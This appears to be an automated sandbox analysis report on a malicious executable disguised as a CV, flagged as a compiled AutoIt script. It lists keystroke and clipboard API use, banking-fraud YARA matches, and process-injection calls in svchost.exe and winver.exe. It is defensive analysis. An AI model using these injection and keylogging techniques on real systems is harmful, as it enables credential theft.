                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00116B0C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00116D07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00116B0C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00102B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00102B37
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0012F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0012F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: This is a third-party compiled AutoIt script.0_2_000C3D19
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_35bb147a-9
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd7b9d64-c
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b08a08ae-9
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5ea29b1a-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C9F3 NtClose,2_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA5D NtAllocateVirtualMemory,2_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D4650 NtSuspendThread,LdrInitializeThunk,5_2_046D4650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D4340 NtSetContextThread,LdrInitializeThunk,5_2_046D4340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2C60 NtCreateKey,LdrInitializeThunk,5_2_046D2C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_046D2C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_046D2CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_046D2D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_046D2D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_046D2DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_046D2DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_046D2EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_046D2E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2F30 NtCreateSection,LdrInitializeThunk,5_2_046D2F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2FE0 NtCreateFile,LdrInitializeThunk,5_2_046D2FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2FB0 NtResumeThread,LdrInitializeThunk,5_2_046D2FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2AF0 NtWriteFile,LdrInitializeThunk,5_2_046D2AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2AD0 NtReadFile,LdrInitializeThunk,5_2_046D2AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2B60 NtClose,LdrInitializeThunk,5_2_046D2B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_046D2BE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_046D2BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_046D2BA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D35C0 NtCreateMutant,LdrInitializeThunk,5_2_046D35C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D39B0 NtGetContextThread,LdrInitializeThunk,5_2_046D39B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2C00 NtQueryInformationProcess,5_2_046D2C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2CF0 NtOpenProcess,5_2_046D2CF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2CC0 NtQueryVirtualMemory,5_2_046D2CC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2D00 NtSetInformationFile,5_2_046D2D00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2DB0 NtEnumerateKey,5_2_046D2DB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2E30 NtWriteVirtualMemory,5_2_046D2E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2EA0 NtAdjustPrivilegesToken,5_2_046D2EA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2F60 NtCreateProcessEx,5_2_046D2F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2FA0 NtQuerySection,5_2_046D2FA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2F90 NtProtectVirtualMemory,5_2_046D2F90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2AB0 NtWaitForSingleObject,5_2_046D2AB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D2B80 NtQueryInformationFile,5_2_046D2B80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D3010 NtOpenDirectoryObject,5_2_046D3010
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D3090 NtSetValueKey,5_2_046D3090
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D3D70 NtOpenThread,5_2_046D3D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D3D10 NtOpenProcessToken,5_2_046D3D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00379310 NtCreateFile,5_2_00379310
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00379480 NtReadFile,5_2_00379480
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00379570 NtDeleteFile,5_2_00379570
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00379610 NtClose,5_2_00379610
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00379780 NtAllocateVirtualMemory,5_2_00379780
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00106606
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000FACC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001079D3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000EB0430_2_000EB043
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000D32000_2_000D3200
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000D3B700_2_000D3B70
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F410F0_2_000F410F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E02A40_2_000E02A4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F038E0_2_000F038E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000CE3B00_2_000CE3B0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F467F0_2_000F467F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E06D90_2_000E06D9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0012AACE0_2_0012AACE
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F4BEF0_2_000F4BEF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000ECCC10_2_000ECCC1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C6F070_2_000C6F07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000CAF500_2_000CAF50
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DB11F0_2_000DB11F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001231BC0_2_001231BC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000ED1B90_2_000ED1B9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E123A0_2_000E123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F724D0_2_000F724D
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001013CA0_2_001013CA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C93F00_2_000C93F0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DF5630_2_000DF563
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C96C00_2_000C96C0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010B6CC0_2_0010B6CC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C77B00_2_000C77B0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0012F7FF0_2_0012F7FF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000F79C90_2_000F79C9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DFA570_2_000DFA57
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C9B600_2_000C9B60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C7D190_2_000C7D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DFE6F0_2_000DFE6F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E9ED00_2_000E9ED0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C7FA30_2_000C7FA3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_01B27CC00_2_01B27CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188E32_2_004188E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100EA2_2_004100EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100F32_2_004100F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031502_2_00403150
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AEE2_2_00416AEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AF32_2_00416AF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2F32_2_0040E2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103132_2_00410313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4432_2_0040E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C602_2_00401C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C7B2_2_00402C7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4382_2_0040E438
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C802_2_00402C80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E48C2_2_0040E48C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004047542_2_00404754
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EFD32_2_0042EFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
